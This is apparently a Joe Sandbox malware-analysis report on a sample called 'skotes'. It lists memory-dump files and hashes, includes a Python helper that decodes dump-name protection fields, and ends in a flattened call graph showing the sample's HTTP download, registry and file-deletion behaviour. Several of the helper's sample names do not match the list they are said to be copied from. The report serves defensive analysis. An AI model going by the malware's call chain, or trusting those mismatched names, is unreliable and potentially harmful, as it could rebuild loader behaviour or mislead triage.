• Instruction Fuzzy Hash: D5211D71A00219AFDF00FBA4DC819BEB7BAEF0A720F101059F501AB251DB709D419FA4
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
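The dump identifiers above alternate between two 8-digit values in the fifth field, 00000080 and 00000040, which are the Windows page-protection constants PAGE_EXECUTE_WRITECOPY and PAGE_EXECUTE_READWRITE, and carry 01000000 (MEM_IMAGE) in the seventh. The following Python helper is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses the dotted name into fields and decodes the protection and region type so the dumps can be sorted and the writable-and-executable image regions picked out. The field layout (process index, phase, dump id, base address, protection, state, region type, module index) is an assumption inferred from the dotted layout and from the values matching winnt.h constants; only the PAGE_* and MEM_* constant values themselves are documented Windows facts. The sample names are copied from the list above.

```python
"""Parse Joe Sandbox .sdmp memory-dump names and decode their protection fields.

Added example; the field layout below is an ASSUMPTION, not Joe Sandbox
documentation. Only the PAGE_* / MEM_* values are documented Windows constants.
"""
import re
from collections import Counter

# Page protection constants from winnt.h (low byte of the protect field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Region type constants from winnt.h (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout: proc.phase.dumpid.base.protect.state.type.module.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)

# Names copied from the "Associated" list in the report (first four and the last).
SAMPLE_NAMES = [
    "00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmp",
]


def parse_sdmp_name(name):
    """Split one dump file name into typed fields; raise on anything else."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    prot = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "process_index": int(m["proc"], 16),
        "phase": int(m["phase"], 16),
        "dump_id": int(m["dump_id"]),
        "base": int(m["base"], 16),
        "protect": prot,
        "protect_name": PAGE_PROTECT.get(prot & 0xFF, f"0x{prot:x}"),
        "state_raw": int(m["state"], 16),  # meaning not decoded here
        "type_name": MEM_TYPE.get(mtype, f"0x{mtype:x}"),
        "module_index": int(m["module"], 16),
    }


def summarize(names):
    """Sort dumps by base address, count protections, list RWX image bases."""
    rows = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r["base"])
    counts = Counter(r["protect_name"] for r in rows)
    # Image pages are normally mapped copy-on-write (PAGE_EXECUTE_WRITECOPY);
    # PAGE_EXECUTE_READWRITE on a MEM_IMAGE region means the protection was
    # changed after load, which is where unpacked code usually lands.
    rwx = [hex(r["base"]) for r in rows
           if r["protect_name"] == "PAGE_EXECUTE_READWRITE" and r["type_name"] == "MEM_IMAGE"]
    return {
        "count": len(rows),
        "by_protection": dict(counts),
        "rwx_bases": rwx,
        "lo": hex(rows[0]["base"]),
        "hi": hex(rows[-1]["base"]),
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_NAMES).items():
        print(f"{k}: {v}")
```

Run against the full list, the helper gives the address range the sandbox dumped for process index 2 and which of those pages were RWX image memory; those are the dumps to open first when looking for the unpacked payload.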
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ___free_lconv_mon
• String ID: 8"o$`'o
• API String ID: 3903695350-933842191
• Opcode ID: 3a00a4d5ae036bc36d74e045e7195c9025937f03ed064251ff6aa66248beff31
• Instruction ID: ef9ce2d450f9a4a8f505e0dfcd7f827ee58bde4eb0c6686d3ce86bd250f26e2a
• Opcode Fuzzy Hash: 3a00a4d5ae036bc36d74e045e7195c9025937f03ed064251ff6aa66248beff31
• Instruction Fuzzy Hash: BF316931600205EFEB24AB79D845FBB77EBEF00316F10842EE04AD7692DE30AC808B55

Execution Graph

Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.4%
Total number of Nodes: 836
Total number of Limit Nodes: 74
execution_graph (flattened node/edge dump of the rendered graph; the per-node numbering and raw edge lists are omitted below and only the named API nodes are kept, grouped by call chain; addresses are the function and basic-block addresses from the dump):
• 69a54d GetFileAttributesA → 69a55d → 69a628 → 69a944 → 69a960 Sleep, CreateMutexA → 69a98e → 6c6629 GetPEB, GetPEB, IsInExceptionSpec
• 697590 Sleep → 6975e3 → 6ad111 SleepConditionVariableCS; 6975ed → 6ad64e RtlAllocateHeap; 697654 → 6ad0c7 RtlWakeAllConditionVariable; 69765e → 6a80c0 → 6976ac CreateThread, Sleep → 697430 (six calls into 6a7a00)
• 69be30 → 69be96 Sleep, InternetOpenW, InternetConnectA → 69bf23 HttpOpenRequestA → 69bfe3 HttpSendRequestA → 69c08e InternetReadFile → 69c0b5 ↔ 69c13f InternetReadFile (read loop)
• 69eb45 GetFileAttributesA and 69ed8c GetFileAttributesA, each preceded by string building through 6a7a00 / 695c10 / 6a83c0 / 6a8220 (RtlAllocateHeap)
• GetPEB nodes: 6959e0 (GetPEB, RtlAllocateHeap, GetPEB, RtlAllocateHeap); 6c6d52 (GetPEB, GetPEB, RtlAllocateHeap, __fassign, __wsopen_s); 6c6da6 (GetPEB, GetPEB, RtlAllocateHeap, __fassign); 6ca671 (GetPEB, GetPEB, __dosmaperr, __freea, IsInExceptionSpec); 6cb5fb and 6cb628 (GetPEB, GetPEB, __cftof)
• Allocation and CRT helpers reached throughout: 6a7a00, 6a80c0, 6a7f80 (Concurrency::details::_CancellationTokenState::_RegisterCallback, RtlAllocateHeap); 6ad3e2 (Concurrency::details::ThreadScheduler::Create, RtlAllocateHeap); 6c8be1 → 6cb04b → 6cb074 RtlAllocateHeap; 692480 (RtlAllocateHeap, ___std_exception_copy); 6a8200 → 6ac1d9 RtlAllocateHeap; 6a9270, 6a9280, 6a8320, 6a8220, 6a83c0, 6a8f40, 6a94e0, 6a8ca0 (RtlAllocateHeap); 6c67b7 → 6c6740 (2 API calls, 4 library calls); 6c8ab6 → 6c8868 → 6c690a
• Entry points of the remaining chains: 6a0cad → 6a0f13 and 69e530 (11 API calls), both ending in 6a1168 after repeated 6a7a00 / 695c10 calls; 695c10 → 695940 → 6959e0 → 694b30
37210 6985d5 ISource 37205->37210 37206 698767 37208 6a8200 RtlAllocateHeap 37206->37208 37207 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37207->37210 37208->37209 37209->36973 37210->37206 37210->37207 37210->37209 37252 6a7760 37211->37252 37213 6a8439 37215 6a8454 __InternalCxxFrameHandler 37213->37215 37264 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37213->37264 37218 6a84a8 __InternalCxxFrameHandler 37215->37218 37265 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37215->37265 37217 6a84ee 37217->36979 37218->36979 37220 6995d4 37219->37220 37221 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37220->37221 37222 69961c 37221->37222 37223 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37222->37223 37226 699635 ISource 37223->37226 37224 69979f 37227 6997fe 37224->37227 37228 6998e0 37224->37228 37225 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37225->37226 37226->37224 37226->37225 37226->37228 37229 695c10 4 API calls 37226->37229 37232 699834 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37226->37232 37233 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37226->37233 37230 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37227->37230 37231 6a8200 RtlAllocateHeap 37228->37231 37229->37226 37230->37232 37231->37232 37232->37038 37233->37226 37235 699284 37234->37235 37236 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37235->37236 37237 6992cc 
37236->37237 37238 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37237->37238 37244 6992e5 ISource 37238->37244 37239 69944f 37241 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37239->37241 37240 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37240->37244 37245 6994c6 ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37241->37245 37242 695c10 4 API calls 37242->37244 37243 699543 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37243->37040 37244->37239 37244->37240 37244->37242 37244->37245 37246 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37244->37246 37245->37243 37247 6a8200 RtlAllocateHeap 37245->37247 37246->37244 37248 699578 37247->37248 37249->37166 37250->37170 37251->37177 37253 6a777b 37252->37253 37263 6a7864 ISource std::_Rethrow_future_exception 37252->37263 37257 6a77ea 37253->37257 37258 6a7811 37253->37258 37262 6a77fb Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37253->37262 37253->37263 37255 6a78f6 37267 692480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37255->37267 37257->37255 37260 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37257->37260 37261 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37258->37261 37258->37262 37259 6a78fb 37260->37262 37261->37262 37262->37263 37266 6a9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37262->37266 37263->37213 37264->37215 37265->37217 37267->37259 37280 6ad762 37289 6ad76e ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 37280->37289 37281 6ad8ce ___scrt_fastfail 37316 6c6629 GetPEB GetPEB IsInExceptionSpec 
37281->37316 37283 6ad8db 37317 6c65ed GetPEB GetPEB IsInExceptionSpec 37283->37317 37285 6ad8e3 ___security_init_cookie 37286 6ad8e9 __scrt_common_main_seh 37285->37286 37287 6ad83f 37299 6c95bc 37287->37299 37289->37281 37289->37287 37298 6ad7be 37289->37298 37315 6c6603 2 API calls 4 library calls 37289->37315 37291 6ad845 37303 6a6d30 37291->37303 37300 6c95ca 37299->37300 37301 6c95c5 37299->37301 37300->37291 37318 6c9320 37301->37318 37342 69a960 Sleep CreateMutexA 37303->37342 37307 6a6d45 37308 69d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37307->37308 37309 6a6d4a 37308->37309 37310 6a4fc0 6 API calls 37309->37310 37311 6a6d4f 37310->37311 37312 696020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37311->37312 37313 6a6d54 37312->37313 37314 696020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37313->37314 37314->37313 37315->37287 37316->37283 37317->37285 37319 6c9329 37318->37319 37320 6c9336 37318->37320 37319->37320 37322 6c934c 37319->37322 37320->37300 37323 6c9358 37322->37323 37324 6c9355 37322->37324 37329 6ce669 37323->37329 37324->37320 37328 6c9364 __freea 37328->37320 37330 6c935f 37329->37330 37331 6ce672 37329->37331 37335 6cea0a 37330->37335 37339 6ca72e GetPEB GetPEB __dosmaperr __freea IsInExceptionSpec 37331->37339 37333 6ce695 37340 6ce4b0 3 API calls 4 library calls 37333->37340 37336 6cea18 __cftof 37335->37336 37338 6cea4a __cftof __freea 37336->37338 37341 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37336->37341 37338->37328 37339->37333 37340->37330 37341->37338 37344 69a98e 37342->37344 37343 69a9a7 37347 69ce40 37343->37347 37344->37343 37352 6c6629 GetPEB GetPEB IsInExceptionSpec 37344->37352 37346 69a9b0 37348 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37347->37348 37349 69ce92 37348->37349 37350 695c10 4 API calls 37349->37350 37351 69ce9d 37350->37351 37352->37346 37353 6c6a44 37354 6c6a5c 37353->37354 37355 6c6a52 37353->37355 37364 6c698d 
37354->37364 37356 6cb655 DeleteFileW 37355->37356 37358 6c6a59 37356->37358 37359 6c6a76 37367 6c68ed 37359->37367 37363 6c6a8a __freea 37365 6c690a __cftof 2 API calls 37364->37365 37366 6c699f __wsopen_s 37365->37366 37366->37359 37372 6c683b 37367->37372 37369 6c6905 37369->37363 37370 6cb655 DeleteFileW 37369->37370 37371 6cb667 __dosmaperr 37370->37371 37371->37363 37373 6c6863 37372->37373 37378 6c6849 __dosmaperr __fassign __wsopen_s 37372->37378 37374 6c686a 37373->37374 37376 6c6889 __fassign 37373->37376 37374->37378 37379 6c69e6 RtlAllocateHeap __wsopen_s 37374->37379 37376->37378 37380 6c69e6 RtlAllocateHeap __wsopen_s 37376->37380 37378->37369 37379->37378 37380->37378 37381 6cc1c4 37382 6cc1ee 37381->37382 37383 6cc259 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __dosmaperr ___std_exception_copy 37381->37383 37382->37383 37385 6d292b 37382->37385 37386 6d2937 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec 37385->37386 37388 6d295c 37386->37388 37389 6d284d 37386->37389 37388->37383 37390 6d2899 37389->37390 37397 6d28a0 __freea 37390->37397 37437 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37390->37437 37392 6d2910 37396 6d290d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37392->37396 37422 6d26f2 37392->37422 37394 6d2907 37398 6d2517 37394->37398 37396->37388 37397->37392 37397->37394 37399 6d2526 __freea 37398->37399 37419 6d26c8 37399->37419 37421 6d2680 ___std_exception_copy 37399->37421 37438 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37399->37438 37401 6d2744 __freea 37404 6d274f GetTimeZoneInformation 37401->37404 37402 6d2842 ___std_exception_copy 37411 6d28a0 __freea 37402->37411 37443 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37402->37443 37410 6d276b 37404->37410 37415 6d27be __cftof 37404->37415 37405 6d2910 37406 6d26f2 4 API calls 37405->37406 37409 6d290d 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37405->37409 37406->37409 37407 6d2907 37408 6d2517 4 API calls 37407->37408 37408->37409 37409->37396 37442 6cef17 GetPEB GetPEB __cftof _unexpected 37410->37442 37411->37405 37411->37407 37413 6d25b6 __freea ___std_exception_copy 37413->37419 37413->37421 37439 6c8bbe GetPEB GetPEB RtlAllocateHeap 37413->37439 37415->37396 37416 6d262a 37416->37421 37440 6c8bbe GetPEB GetPEB RtlAllocateHeap 37416->37440 37418 6d2651 37418->37421 37441 6c8bbe GetPEB GetPEB RtlAllocateHeap 37418->37441 37419->37396 37421->37401 37421->37402 37421->37419 37423 6d2701 37422->37423 37424 6d2744 __freea 37423->37424 37425 6d2842 ___std_exception_copy 37423->37425 37427 6d274f GetTimeZoneInformation 37424->37427 37434 6d28a0 __freea 37425->37434 37445 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37425->37445 37433 6d276b 37427->37433 37436 6d27be __cftof 37427->37436 37428 6d2910 37429 6d26f2 4 API calls 37428->37429 37432 6d290d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37428->37432 37429->37432 37430 6d2907 37431 6d2517 4 API calls 37430->37431 37431->37432 37432->37396 37444 6cef17 GetPEB GetPEB __cftof _unexpected 37433->37444 37434->37428 37434->37430 37436->37396 37437->37397 37438->37413 37439->37416 37440->37418 37441->37421 37442->37415 37443->37411 37444->37436 37445->37434 37446 6a6d00 CreateThread 37447 6a6d20 Sleep 37446->37447 37448 6a6c70 37446->37448 37447->37447 37452 6a6ca0 37448->37452 37449 695c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37449->37452 37450 6a7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37450->37452 37452->37449 37452->37450 37453 6a47b0 37452->37453 37454 6a47eb 37453->37454 37457 6a4e70 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37453->37457 37455 6a7a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37454->37455 37454->37457 37456 6a480c 37455->37456 37458 695c10 4 API calls 37456->37458 37457->37452 37459 6a4813 37458->37459 37460 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37459->37460 37461 6a4825 37460->37461 37462 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37461->37462 37463 6a4837 37462->37463 37464 69be30 11 API calls 37463->37464 37465 6a4843 37464->37465 37466 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465->37466 37467 6a4858 37466->37467 37468 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37467->37468 37469 6a4870 37468->37469 37470 695c10 4 API calls 37469->37470 37471 6a4877 37470->37471 37472 698580 RtlAllocateHeap 37471->37472 37473 6a4883 37472->37473 37474 6a4afd 37473->37474 37476 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37473->37476 37475 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37474->37475 37528 6a4f9c 37474->37528 37478 6a4b2f 37475->37478 37477 6a489f 37476->37477 37479 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37477->37479 37480 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37478->37480 37481 6a48b7 37479->37481 37482 6a4b44 37480->37482 37483 695c10 4 API calls 37481->37483 37484 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37482->37484 37485 6a48be 37483->37485 37486 6a4b56 37484->37486 37487 698580 RtlAllocateHeap 37485->37487 37488 69be30 11 API calls 37486->37488 37489 6a48ca 37487->37489 37490 6a4b62 37488->37490 37489->37474 37492 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37489->37492 37491 6a7a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37490->37491 37493 6a4b77 37491->37493 37494 6a48e7 37492->37494 37495 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37493->37495 37496 695c10 4 API calls 37494->37496 37497 6a4b8f 37495->37497 37501 6a48ef 37496->37501 37498 695c10 4 API calls 37497->37498 37499 6a4b96 37498->37499 37500 698580 RtlAllocateHeap 37499->37500 37502 6a4ba2 37500->37502 37503 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37501->37503 37502->37457 37504 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37502->37504 37512 6a4959 ISource 37503->37512 37505 6a4bbe 37504->37505 37506 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37505->37506 37507 6a4bd6 37506->37507 37508 695c10 4 API calls 37507->37508 37511 6a4bdd 37508->37511 37509 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37510 6a49e6 37509->37510 37513 695c10 4 API calls 37510->37513 37514 698580 RtlAllocateHeap 37511->37514 37512->37509 37517 6a49ee 37513->37517 37515 6a4be9 37514->37515 37515->37457 37516 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37515->37516 37518 6a4c06 37516->37518 37519 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37517->37519 37520 695c10 4 API calls 37518->37520 37521 6a4a49 ISource 37519->37521 37522 6a4c0e 37520->37522 37521->37474 37571 6998f0 37521->37571 37523 6a4c5a 37522->37523 37524 6a4f97 37522->37524 37527 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37523->37527 37526 6a8200 RtlAllocateHeap 37524->37526 37526->37528 37534 6a4c78 ISource 37527->37534 37576 6ac1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37528->37576 
37530 6a4ad5 __dosmaperr 37530->37474 37532 6c8ab6 3 API calls 37530->37532 37531 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37533 6a4d05 37531->37533 37532->37474 37535 695c10 4 API calls 37533->37535 37534->37457 37534->37531 37536 6a4d0d 37535->37536 37537 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37536->37537 37538 6a4d68 ISource 37537->37538 37538->37457 37539 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37538->37539 37540 6a4df7 37539->37540 37541 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37540->37541 37542 6a4e0c 37541->37542 37543 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37542->37543 37544 6a4e27 37543->37544 37545 695c10 4 API calls 37544->37545 37546 6a4e2e 37545->37546 37547 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37546->37547 37548 6a4e67 37547->37548 37550 6a4390 37548->37550 37551 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37550->37551 37552 6a43d2 37551->37552 37553 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37552->37553 37554 6a43e4 37553->37554 37555 698580 RtlAllocateHeap 37554->37555 37556 6a43ed 37555->37556 37557 6a4646 37556->37557 37560 6a43f8 ISource 37556->37560 37558 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37557->37558 37559 6a4657 37558->37559 37561 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37559->37561 37562 6a80c0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37560->37562 37565 6a4610 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37560->37565 37566 6a9280 RtlAllocateHeap 37560->37566 37569 6a7a00 RtlAllocateHeap 
Concurrency::details::_CancellationTokenState::_RegisterCallback 37560->37569 37577 6a3640 37560->37577 37563 6a466c 37561->37563 37562->37560 37564 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37563->37564 37567 6a467e 37564->37567 37565->37457 37566->37560 37568 6a3640 13 API calls 37567->37568 37568->37565 37569->37560 37572 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37571->37572 37573 69991e 37572->37573 37574 695c10 4 API calls 37573->37574 37575 699927 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37574->37575 37575->37530 37576->37457 37578 6a367f 37577->37578 37580 6a3e6f ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37577->37580 37579 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37578->37579 37581 6a36b0 37579->37581 37580->37560 37582 6a4327 37581->37582 37584 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37581->37584 37583 6a8200 RtlAllocateHeap 37582->37583 37585 6a432c 37583->37585 37586 6a36ff 37584->37586 37587 6a8200 RtlAllocateHeap 37585->37587 37586->37582 37588 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37586->37588 37591 6a4331 Concurrency::details::_CancellationTokenState::_RegisterCallback 37587->37591 37589 6a3743 37588->37589 37589->37582 37590 6a3765 37589->37590 37592 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37590->37592 37593 6a8200 RtlAllocateHeap 37591->37593 37594 6a3785 37592->37594 37598 6a4340 Concurrency::details::_CancellationTokenState::_RegisterCallback 37593->37598 37595 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 
